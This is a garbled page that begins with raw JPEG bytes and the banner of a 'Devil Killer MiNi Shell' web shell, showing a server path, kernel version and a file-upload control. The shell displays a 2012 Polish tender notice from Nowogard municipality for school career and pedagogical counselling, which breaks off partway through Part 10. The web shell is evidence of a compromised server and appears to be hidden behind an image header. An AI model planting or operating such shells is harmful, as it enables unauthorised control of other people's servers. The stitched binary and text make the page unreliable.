JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121102/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121102/430226-N-2012.html

<p class="kh_header"><b>Nowogard: Świadczenie usług doradztwa zawodowego i pedagogicznego w ramach projektu p.n. Szkoły nowogardzkiej gminy na edukacyjne wyżyny</b><br>
<b>Numer ogłoszenia: 430226 - 2012; data zamieszczenia: 02.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Nowogard , Plac Wolności 1, 72-200 Nowogard, woj. zachodniopomorskie, tel. 091 3926200, faks 091 3926206.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nowogard.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług doradztwa zawodowego i pedagogicznego w ramach projektu p.n. Szkoły nowogardzkiej gminy na edukacyjne wyżyny.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1 zamówienia - pełnienie funkcji doradcy zawodowego w GM 1 w Nowogardzie.
Przedmiotem zamówienia jest prowadzenie zajęć związanych z wyborem kierunku kształcenia i zawodu oraz planowaniem kształcenia i kariery zawodowej, diagnozowanie zapotrzebowania poszczególnych uczniów na informacje edukacyjne i zawodowe oraz pomoc w planowaniu kształcenia i kariery zawodowej. Celem zajęć ma być wspomaganie uczniów w podejmowaniu decyzji edukacyjnych i zawodowych, przy wykorzystaniu aktywnych metod pracy. Konsultacje indywidualne z każdym uczniem klasy III gimnazjalnej w każdym roku trwania projektu.
1.	Przedmiotem zamówienia jest prowadzenie zajęć doradztwa zawodowego, konsultacje indywidualne dla dzieci. W ramach części 1 przewidziane jest 289 godziny zajęć konsultacji indywidualnych. Wykonawca będzie związany podziałem dokonanym przez Zamawiającego.  Do przeprowadzenia zajęć zostaną użyte pomoce interaktywne. Uwaga - jedna godzina zajęć =60 min.
2.	Wykonawca zapewnia opiekę dzieciom w trakcie zajęć, a w przypadku osób odwożonych do miejsca zamieszkania, zobowiązuje się do odprowadzenia uczestników zajęć do podstawionego pojazdu. Jeśli uczestnicy zajęć dowożeni są na zajęcia, Wykonawca zobowiązany jest również do odebrania uczestników zajęć z pojazdu i zapewnienia im opieki od momentu odebrania z pojazdu.
3.	Częstotliwość zajęć - według harmonogramu, w szczególnych przypadkach - częściej. Zajęcia odbywać się winny w dni nauki szkolnej (pon. - pt.) w godzinach pracy szkoły w uzgodnieniu z Dyrektorem Szkoły. 
4.	Wykonawca będzie obowiązany do przedkładania Zamawiającemu do zatwierdzenia harmonogramów zajęć, sporządzonych w uzgodnieniu z Dyrekcją Szkoły przed rozpoczęciem zajęć. Zamawiający zastrzega sobie prawo do wprowadzania zmian w przedłożonych harmonogramach. 
5.	Zamawiający wymaga od Wykonawcy osobistego wykonania zamówienia, wyłącznie przez osoby wykazane w ofercie (wykazie osób zał. 3).
6.	Wykonawca zobowiązany jest do prowadzenia listy obecności i dzienników zajęć wg wzorów przekazanych przez Zamawiającego
7.	Łączna liczba godzin zajęć w ramach części 1 zamówienia - 289 godzin. 
8.	Termin zakończenia zajęć - 30.06.2015 r.
9.	Za wykonanie zadania Zamawiający zapłaci każdemu z wykonawców wynagrodzenie po całkowitym wykonaniu przez niego danego zadania.

Część 2 zamówienia - pełnienie funkcji doradcy zawodowego w GM 2 w Nowogardzie.
Przedmiotem zamówienia jest prowadzenie zajęć związanych z wyborem kierunku kształcenia i zawodu oraz planowaniem kształcenia i kariery zawodowej, diagnozowanie zapotrzebowania poszczególnych uczniów na informacje edukacyjne i zawodowe oraz pomoc w planowaniu kształcenia i kariery zawodowej. Celem zajęć ma być wspomaganie uczniów w podejmowaniu decyzji edukacyjnych i zawodowych, przy wykorzystaniu aktywnych metod pracy. Konsultacje indywidualne z każdym uczniem klasy III gimnazjalnej w każdym roku trwania projektu.
1.	Przedmiotem zamówienia jest prowadzenie zajęć doradztwa zawodowego, konsultacje indywidualne dla dzieci. W ramach części 2 przewidziane jest 416 godziny zajęć konsultacji indywidualnych. Wykonawca będzie związany podziałem dokonanym przez Zamawiającego.  Do przeprowadzenia zajęć zostaną użyte pomoce interaktywne. Uwaga - jedna godzina zajęć =60 min.
2.	Wykonawca zapewnia opiekę dzieciom w trakcie zajęć, a w przypadku osób odwożonych do miejsca zamieszkania, zobowiązuje się do odprowadzenia uczestników zajęć do podstawionego pojazdu. Jeśli uczestnicy zajęć dowożeni są na zajęcia, Wykonawca zobowiązany jest również do odebrania uczestników zajęć z pojazdu i zapewnienia im opieki od momentu odebrania z pojazdu.
3.	Częstotliwość zajęć - według harmonogramu, w szczególnych przypadkach - częściej. Zajęcia odbywać się winny w dni nauki szkolnej (pon. - pt.) w godzinach pracy szkoły w uzgodnieniu z Dyrektorem Szkoły. 
4.	Wykonawca będzie obowiązany do przedkładania Zamawiającemu do zatwierdzenia harmonogramów zajęć, sporządzonych w uzgodnieniu z Dyrekcją Szkoły przed rozpoczęciem zajęć. Zamawiający zastrzega sobie prawo do wprowadzania zmian w przedłożonych harmonogramach. 
5.	Zamawiający wymaga od Wykonawcy osobistego wykonania zamówienia, wyłącznie przez osoby wykazane w ofercie (wykazie osób zał. 3).
6.	Wykonawca zobowiązany jest do prowadzenia listy obecności i dzienników zajęć wg wzorów przekazanych przez Zamawiającego
7.	Łączna liczba godzin zajęć w ramach części 2 zamówienia - 414 godzin. 
8.	Termin zakończenia zajęć - 30.06.2015 r.
9.	Za wykonanie zadania Zamawiający zapłaci każdemu z wykonawców wynagrodzenie po całkowitym wykonaniu przez niego danego zadania.

Część 3 zamówienia - pełnienie funkcji doradcy zawodowego w GM 3 w Nowogardzie.
Przedmiotem zamówienia jest prowadzenie zajęć związanych z wyborem kierunku kształcenia i zawodu oraz planowaniem kształcenia i kariery zawodowej, diagnozowanie zapotrzebowania poszczególnych uczniów na informacje edukacyjne i zawodowe oraz pomoc w planowaniu kształcenia i kariery zawodowej. Celem zajęć ma być wspomaganie uczniów w podejmowaniu decyzji edukacyjnych i zawodowych, przy wykorzystaniu aktywnych metod pracy. Konsultacje indywidualne z każdym uczniem klasy III gimnazjalnej w każdym roku trwania projektu.
1.	Przedmiotem zamówienia jest prowadzenie zajęć doradztwa zawodowego, konsultacje indywidualne dla dzieci. W ramach części 3 przewidziane jest 124 godziny zajęć konsultacji indywidualnych. Wykonawca będzie związany podziałem dokonanym przez Zamawiającego.  Do przeprowadzenia zajęć zostaną użyte pomoce interaktywne. Uwaga - jedna godzina zajęć =60 min.
2.	Wykonawca zapewnia opiekę dzieciom w trakcie zajęć, a w przypadku osób odwożonych do miejsca zamieszkania, zobowiązuje się do odprowadzenia uczestników zajęć do podstawionego pojazdu. Jeśli uczestnicy zajęć dowożeni są na zajęcia, Wykonawca zobowiązany jest również do odebrania uczestników zajęć z pojazdu i zapewnienia im opieki od momentu odebrania z pojazdu.
3.	Częstotliwość zajęć - według harmonogramu, w szczególnych przypadkach - częściej. Zajęcia odbywać się winny w dni nauki szkolnej (pon. - pt.) w godzinach pracy szkoły w uzgodnieniu z Dyrektorem Szkoły. 
4.	Wykonawca będzie obowiązany do przedkładania Zamawiającemu do zatwierdzenia harmonogramów zajęć, sporządzonych w uzgodnieniu z Dyrekcją Szkoły przed rozpoczęciem zajęć. Zamawiający zastrzega sobie prawo do wprowadzania zmian w przedłożonych harmonogramach. 
5.	Zamawiający wymaga od Wykonawcy osobistego wykonania zamówienia, wyłącznie przez osoby wykazane w ofercie (wykazie osób zał. 3).
6.	Wykonawca zobowiązany jest do prowadzenia listy obecności i dzienników zajęć wg wzorów przekazanych przez Zamawiającego
7.	Łączna liczba godzin zajęć w ramach części 3 zamówienia - 124 godzin. 
8.	Termin zakończenia zajęć - 30.06.2015 r.
9.	Za wykonanie zadania Zamawiający zapłaci każdemu z wykonawców wynagrodzenie po całkowitym wykonaniu przez niego danego zadania.

Część 4 zamówienia - pełnienie funkcji doradcy zawodowego w SP 1 w Nowogardzie.
Przedmiotem zamówienia jest prowadzenie zajęć związanych z wyborem kierunku kształcenia i zawodu oraz planowaniem kształcenia i kariery zawodowej, diagnozowanie zapotrzebowania poszczególnych uczniów na informacje edukacyjne i zawodowe oraz pomoc w planowaniu kształcenia i kariery zawodowej. Celem zajęć ma być wspomaganie uczniów w podejmowaniu decyzji edukacyjnych i zawodowych, przy wykorzystaniu aktywnych metod pracy. Konsultacje indywidualne z każdym uczniem klasy VI szkoły podstawowej w każdym roku trwania projektu.
1.	Przedmiotem zamówienia jest prowadzenie zajęć doradztwa zawodowego, konsultacje indywidualne dla dzieci. W ramach części 4 przewidziane jest 190 godziny zajęć konsultacji indywidualnych. Wykonawca będzie związany podziałem dokonanym przez Zamawiającego.  Do przeprowadzenia zajęć zostaną użyte pomoce interaktywne. Uwaga - jedna godzina zajęć =60 min.
2.	Wykonawca zapewnia opiekę dzieciom w trakcie zajęć, a w przypadku osób odwożonych do miejsca zamieszkania, zobowiązuje się do odprowadzenia uczestników zajęć do podstawionego pojazdu. Jeśli uczestnicy zajęć dowożeni są na zajęcia, Wykonawca zobowiązany jest również do odebrania uczestników zajęć z pojazdu i zapewnienia im opieki od momentu odebrania z pojazdu.
3.	Częstotliwość zajęć - według harmonogramu, w szczególnych przypadkach - częściej. Zajęcia odbywać się winny w dni nauki szkolnej (pon. - pt.) w godzinach pracy szkoły w uzgodnieniu z Dyrektorem Szkoły. 
4.	Wykonawca będzie obowiązany do przedkładania Zamawiającemu do zatwierdzenia harmonogramów zajęć, sporządzonych w uzgodnieniu z Dyrekcją Szkoły przed rozpoczęciem zajęć. Zamawiający zastrzega sobie prawo do wprowadzania zmian w przedłożonych harmonogramach. 
5.	Zamawiający wymaga od Wykonawcy osobistego wykonania zamówienia, wyłącznie przez osoby wykazane w ofercie (wykazie osób zał. 3).
6.	Wykonawca zobowiązany jest do prowadzenia listy obecności i dzienników zajęć wg wzorów przekazanych przez Zamawiającego
7.	Łączna liczba godzin zajęć w ramach części 4 zamówienia - 188 godzin. 
8.	Termin zakończenia zajęć - 30.06.2015 r.
9.	Za wykonanie zadania Zamawiający zapłaci każdemu z wykonawców wynagrodzenie po całkowitym wykonaniu przez niego danego zadania.

Część 5 zamówienia - pełnienie funkcji doradcy zawodowego w SP 2 w Nowogardzie.
Przedmiotem zamówienia jest prowadzenie zajęć związanych z wyborem kierunku kształcenia i zawodu oraz planowaniem kształcenia i kariery zawodowej, diagnozowanie zapotrzebowania poszczególnych uczniów na informacje edukacyjne i zawodowe oraz pomoc w planowaniu kształcenia i kariery zawodowej. Celem zajęć ma być wspomaganie uczniów w podejmowaniu decyzji edukacyjnych i zawodowych, przy wykorzystaniu aktywnych metod pracy. Konsultacje indywidualne z każdym uczniem klasy VI szkoły podstawowej w każdym roku trwania projektu.
1.	Przedmiotem zamówienia jest prowadzenie zajęć doradztwa zawodowego, konsultacje indywidualne dla dzieci. W ramach części 5 przewidziane jest 143 godziny zajęć konsultacji indywidualnych. Wykonawca będzie związany podziałem dokonanym przez Zamawiającego.  Do przeprowadzenia zajęć zostaną użyte pomoce interaktywne. Uwaga - jedna godzina zajęć =60 min.
2.	Wykonawca zapewnia opiekę dzieciom w trakcie zajęć, a w przypadku osób odwożonych do miejsca zamieszkania, zobowiązuje się do odprowadzenia uczestników zajęć do podstawionego pojazdu. Jeśli uczestnicy zajęć dowożeni są na zajęcia, Wykonawca zobowiązany jest również do odebrania uczestników zajęć z pojazdu i zapewnienia im opieki od momentu odebrania z pojazdu.
3.	Częstotliwość zajęć - według harmonogramu, w szczególnych przypadkach - częściej. Zajęcia odbywać się winny w dni nauki szkolnej (pon. - pt.) w godzinach pracy szkoły w uzgodnieniu z Dyrektorem Szkoły. 
4.	Wykonawca będzie obowiązany do przedkładania Zamawiającemu do zatwierdzenia harmonogramów zajęć, sporządzonych w uzgodnieniu z Dyrekcją Szkoły przed rozpoczęciem zajęć. Zamawiający zastrzega sobie prawo do wprowadzania zmian w przedłożonych harmonogramach. 
5.	Zamawiający wymaga od Wykonawcy osobistego wykonania zamówienia, wyłącznie przez osoby wykazane w ofercie (wykazie osób zał. 3).
6.	Wykonawca zobowiązany jest do prowadzenia listy obecności i dzienników zajęć wg wzorów przekazanych przez Zamawiającego
7.	Łączna liczba godzin zajęć w ramach części 5 zamówienia - 141 godzin. 
8.	Termin zakończenia zajęć - 30.06.2015 r.
9.	Za wykonanie zadania Zamawiający zapłaci każdemu z wykonawców wynagrodzenie po całkowitym wykonaniu przez niego danego zadania

Część 6 zamówienia - pełnienie funkcji doradcy zawodowego w SP 3 w Nowogardzie.
Przedmiotem zamówienia jest prowadzenie zajęć związanych z wyborem kierunku kształcenia i zawodu oraz planowaniem kształcenia i kariery zawodowej, diagnozowanie zapotrzebowania poszczególnych uczniów na informacje edukacyjne i zawodowe oraz pomoc w planowaniu kształcenia i kariery zawodowej. Celem zajęć ma być wspomaganie uczniów w podejmowaniu decyzji edukacyjnych i zawodowych, przy wykorzystaniu aktywnych metod pracy. Konsultacje indywidualne z każdym uczniem klasy VI szkoły podstawowej w każdym roku trwania projektu.
1.	Przedmiotem zamówienia jest prowadzenie zajęć doradztwa zawodowego, konsultacje indywidualne dla dzieci. W ramach części 6 przewidziane jest 157 godziny zajęć konsultacji indywidualnych. Wykonawca będzie związany podziałem dokonanym przez Zamawiającego.  Do przeprowadzenia zajęć zostaną użyte pomoce interaktywne. Uwaga - jedna godzina zajęć =60 min.
2.	Wykonawca zapewnia opiekę dzieciom w trakcie zajęć, a w przypadku osób odwożonych do miejsca zamieszkania, zobowiązuje się do odprowadzenia uczestników zajęć do podstawionego pojazdu. Jeśli uczestnicy zajęć dowożeni są na zajęcia, Wykonawca zobowiązany jest również do odebrania uczestników zajęć z pojazdu i zapewnienia im opieki od momentu odebrania z pojazdu.
3.	Częstotliwość zajęć - według harmonogramu, w szczególnych przypadkach - częściej. Zajęcia odbywać się winny w dni nauki szkolnej (pon. - pt.) w godzinach pracy szkoły w uzgodnieniu z Dyrektorem Szkoły. 
4.	Wykonawca będzie obowiązany do przedkładania Zamawiającemu do zatwierdzenia harmonogramów zajęć, sporządzonych w uzgodnieniu z Dyrekcją Szkoły przed rozpoczęciem zajęć. Zamawiający zastrzega sobie prawo do wprowadzania zmian w przedłożonych harmonogramach. 
5.	Zamawiający wymaga od Wykonawcy osobistego wykonania zamówienia, wyłącznie przez osoby wykazane w ofercie (wykazie osób zał. 3).
6.	Wykonawca zobowiązany jest do prowadzenia listy obecności i dzienników zajęć wg wzorów przekazanych przez Zamawiającego
7.	Łączna liczba godzin zajęć w ramach części 6 zamówienia - 155 godzin. 
8.	Termin zakończenia zajęć - 30.06.2015 r.
9.	Za wykonanie zadania Zamawiający zapłaci każdemu z wykonawców wynagrodzenie po całkowitym wykonaniu przez niego danego zadania

Część 7 zamówienia - pełnienie funkcji doradcy zawodowego w SP 4 w Nowogardzie.
Przedmiotem zamówienia jest prowadzenie zajęć związanych z wyborem kierunku kształcenia i zawodu oraz planowaniem kształcenia i kariery zawodowej, diagnozowanie zapotrzebowania poszczególnych uczniów na informacje edukacyjne i zawodowe oraz pomoc w planowaniu kształcenia i kariery zawodowej. Celem zajęć ma być wspomaganie uczniów w podejmowaniu decyzji edukacyjnych i zawodowych, przy wykorzystaniu aktywnych metod pracy. Konsultacje indywidualne z każdym uczniem klasy VI szkoły podstawowej w każdym roku trwania projektu.
1.	Przedmiotem zamówienia jest prowadzenie zajęć doradztwa zawodowego, konsultacje indywidualne dla dzieci. W ramach części 7 przewidziane jest 74 godziny zajęć konsultacji indywidualnych. Wykonawca będzie związany podziałem dokonanym przez Zamawiającego.  Do przeprowadzenia zajęć zostaną użyte pomoce interaktywne. Uwaga - jedna godzina zajęć =60 min.
2.	Wykonawca zapewnia opiekę dzieciom w trakcie zajęć, a w przypadku osób odwożonych do miejsca zamieszkania, zobowiązuje się do odprowadzenia uczestników zajęć do podstawionego pojazdu. Jeśli uczestnicy zajęć dowożeni są na zajęcia, Wykonawca zobowiązany jest również do odebrania uczestników zajęć z pojazdu i zapewnienia im opieki od momentu odebrania z pojazdu.
3.	Częstotliwość zajęć - według harmonogramu, w szczególnych przypadkach - częściej. Zajęcia odbywać się winny w dni nauki szkolnej (pon. - pt.) w godzinach pracy szkoły w uzgodnieniu z Dyrektorem Szkoły. 
4.	Wykonawca będzie obowiązany do przedkładania Zamawiającemu do zatwierdzenia harmonogramów zajęć, sporządzonych w uzgodnieniu z Dyrekcją Szkoły przed rozpoczęciem zajęć. Zamawiający zastrzega sobie prawo do wprowadzania zmian w przedłożonych harmonogramach. 
5.	Zamawiający wymaga od Wykonawcy osobistego wykonania zamówienia, wyłącznie przez osoby wykazane w ofercie (wykazie osób zał. 3).
6.	Wykonawca zobowiązany jest do prowadzenia listy obecności i dzienników zajęć wg wzorów przekazanych przez Zamawiającego
7.	Łączna liczba godzin zajęć w ramach części 7 zamówienia - 74 godzin. 
8.	Termin zakończenia zajęć - 30.06.2015 r.
9.	Za wykonanie zadania Zamawiający zapłaci każdemu z wykonawców wynagrodzenie po całkowitym wykonaniu przez niego danego zadania

Część 8 zamówienia - pełnienie funkcji doradcy zawodowego w SP wiejskich (wiejskich tj.: w Błotnie, Wierzbięcinie, Żabowie, Długołęce, Orzechowie, Strzelewie).
Przedmiotem zamówienia jest prowadzenie zajęć związanych z wyborem kierunku kształcenia i zawodu oraz planowaniem kształcenia i kariery zawodowej, diagnozowanie zapotrzebowania poszczególnych uczniów na informacje edukacyjne i zawodowe oraz pomoc w planowaniu kształcenia i kariery zawodowej. Celem zajęć ma być wspomaganie uczniów w podejmowaniu decyzji edukacyjnych i zawodowych, przy wykorzystaniu aktywnych metod pracy. Konsultacje indywidualne z każdym uczniem klasy VI szkoły podstawowej w każdym roku trwania projektu.
1.	Przedmiotem zamówienia jest prowadzenie zajęć doradztwa zawodowego, konsultacje indywidualne dla dzieci. W ramach części 8 przewidziane jest 176 godziny zajęć konsultacji indywidualnych. Wykonawca będzie związany podziałem dokonanym przez Zamawiającego.  Do przeprowadzenia zajęć zostaną użyte pomoce interaktywne. Uwaga - jedna godzina zajęć =60 min.
2.	Wykonawca zapewnia opiekę dzieciom w trakcie zajęć, a w przypadku osób odwożonych do miejsca zamieszkania, zobowiązuje się do odprowadzenia uczestników zajęć do podstawionego pojazdu. Jeśli uczestnicy zajęć dowożeni są na zajęcia, Wykonawca zobowiązany jest również do odebrania uczestników zajęć z pojazdu i zapewnienia im opieki od momentu odebrania z pojazdu.
3.	Częstotliwość zajęć - według harmonogramu, w szczególnych przypadkach - częściej. Zajęcia odbywać się winny w dni nauki szkolnej (pon. - pt.) w godzinach pracy szkoły w uzgodnieniu z Dyrekcję Szkoły. 
4.	Wykonawca będzie obowiązany do przedkładania Zamawiającemu do zatwierdzenia harmonogramów zajęć, sporządzonych w uzgodnieniu z Dyrekcją Szkoły przed rozpoczęciem zajęć. Zamawiający zastrzega sobie prawo do wprowadzania zmian w przedłożonych harmonogramach. 
5.	Zamawiający wymaga od Wykonawcy osobistego wykonania zamówienia, wyłącznie przez osoby wykazane w ofercie (wykazie osób zał. 3).
6.	Wykonawca zobowiązany jest do prowadzenia listy obecności i dzienników zajęć wg wzorów przekazanych przez Zamawiającego
7.	Łączna liczba godzin zajęć w ramach części 8 zamówienia - 173 godzin. 
8.	Termin zakończenia zajęć - 30.06.2015 r.
9.	Za wykonanie zadania Zamawiający zapłaci każdemu z wykonawców wynagrodzenie po całkowitym wykonaniu przez niego danego zadania

Część 9 zamówienia - wykonanie usługi warsztatów Twoja przyszłość w twoich rękach po 10 godzin warsztatów grupowych w 13 szkołach biorących udział w projekcie ( tj. GM 1, GM 2, GM 3 w Nowogardzie, w SP 1, SP 2, SP 3, SP 4 w Nowogardzie i SP w Błotnie, Wierzbięcinie, Żabowie, Długołęce, Orzechowie, Strzelewie).
Warsztaty pn. Twoja przyszłość w twoich rękach mają na celu przygotowanie do aktywnego kształtowania swojej drogi zawodowej a także kształcenie umiejętności planowania przyszłości i konsekwentnego dążenia do realizacji swoich celów, kreowanie postaw aktywnych, przezwyciężanie bierności, radzenia sobie w sytuacjach trudnych i stresowych, doskonalenie umiejętności planowania przyszłości zawodowej, umiejętność poszukiwania pracy.  Warsztaty mają odbywać się po 2 godziny na 5 spotkaniach w każdej szkole w każdym roku realizacji projektu.
1.	Przedmiotem zamówienia jest warsztatów dla dzieci. W ramach części 9 przewidziane jest 390 godziny zajęć. Wykonawca będzie związany podziałem dokonanym przez Zamawiającego.  Do przeprowadzenia zajęć zostaną użyte pomoce interaktywne. Uwaga - jedna godzina zajęć =60 min.
2.	Wykonawca zapewnia opiekę dzieciom w trakcie zajęć, a w przypadku grupy odwożonej do miejsca zamieszkania, zobowiązuje się do odprowadzenia uczestników zajęć do podstawionego pojazdu. Jeśli uczestnicy zajęć dowożeni są na zajęcia, Wykonawca zobowiązany jest również do odebrania uczestników zajęć z pojazdu i zapewnienia im opieki od momentu odebrania z pojazdu.
3.	Częstotliwość zajęć - według harmonogramu, w szczególnych przypadkach - częściej. Zajęcia odbywać się winny w dni nauki szkolnej (pon. - pt.) w godzinach pracy szkoły w uzgodnieniu z Dyrekcję Szkoły. 
4.	Wykonawca będzie obowiązany do przedkładania Zamawiającemu do zatwierdzenia harmonogramów zajęć, sporządzonych w uzgodnieniu z Dyrekcją Szkoły przed rozpoczęciem zajęć. Zamawiający zastrzega sobie prawo do wprowadzania zmian w przedłożonych harmonogramach. 
5.	Zamawiający wymaga od Wykonawcy osobistego wykonania zamówienia, wyłącznie przez osoby wykazane w ofercie (wykazie osób zał. 3).
6.	Wykonawca zobowiązany jest do prowadzenia listy obecności i dzienników zajęć wg wzorów przekazanych przez Zamawiającego
7.	Łączna liczba godzin zajęć w ramach części 9 zamówienia - 390 godzin. 
8.	Termin zakończenia zajęć - 30.06.2015 r.
9.	Do realizacji zadania wyznaczyć należy minimum 1 osoba, która będą pełnić na rzecz Zamawiającego usługi Warsztaty Twoja przyszłość w twoich rękach w 10 SP (SP 1, SP 2, SP 3 SP 4 w Nowogardzie i Szkołach wiejskich w Błotnie, Wierzbięcinie, Żabowie, Długołęce, Orzechowie, Strzelewie) i 3 GM w Nowogardzie (GM 1, GM 2, GM 3 w Nowogardzie).
10.	Za wykonanie zadania Zamawiający zapłaci każdemu z wykonawców wynagrodzenie po całkowitym wykonaniu przez niego danego zadania

Część 10 zamówienia - pełnienie funkcji doradcy pedagogicznego w GM 1 
w Nowogardzie.
Warsztaty pedagogiczne skierowane są do uczniów mających zaniżoną samoocenę, kłopoty z komunikacją społeczna. Zajęcia mają być prowadzone metodami aktywizującymi, ekspresyjnymi i integracyjnymi.  W każdym gimnazjum 2 grupy po 8 osób.
1.	Przedmiotem zamówienia jest prowadzenie zajęć doradztwa pedagogicznego w grupach. W ramach części 10 przewidziane jest 240 godziny zajęć grupowych. Wykonawca będzie związany podziałem dokonanym przez Zamawiającego.  Do przeprowadzenia zajęć zostaną użyte pomoce interaktywne. Uwaga - jedna godzina zajęć =60 min.
2.	Wykonawca zapewnia opiekę dzieciom w trakcie zajęć, a w przypadku grupy odwożonej do miejsca zamieszkania, zobowiązuje się do odprowadzenia uczestników zajęć do podstawionego pojazdu. Jeśli uczestnicy zajęć dowożeni są na zajęcia, Wykonawca zobowiązany jest również do odebrania uczestników zajęć z pojazdu i zapewnienia im opieki od momentu odebrania z pojazdu.
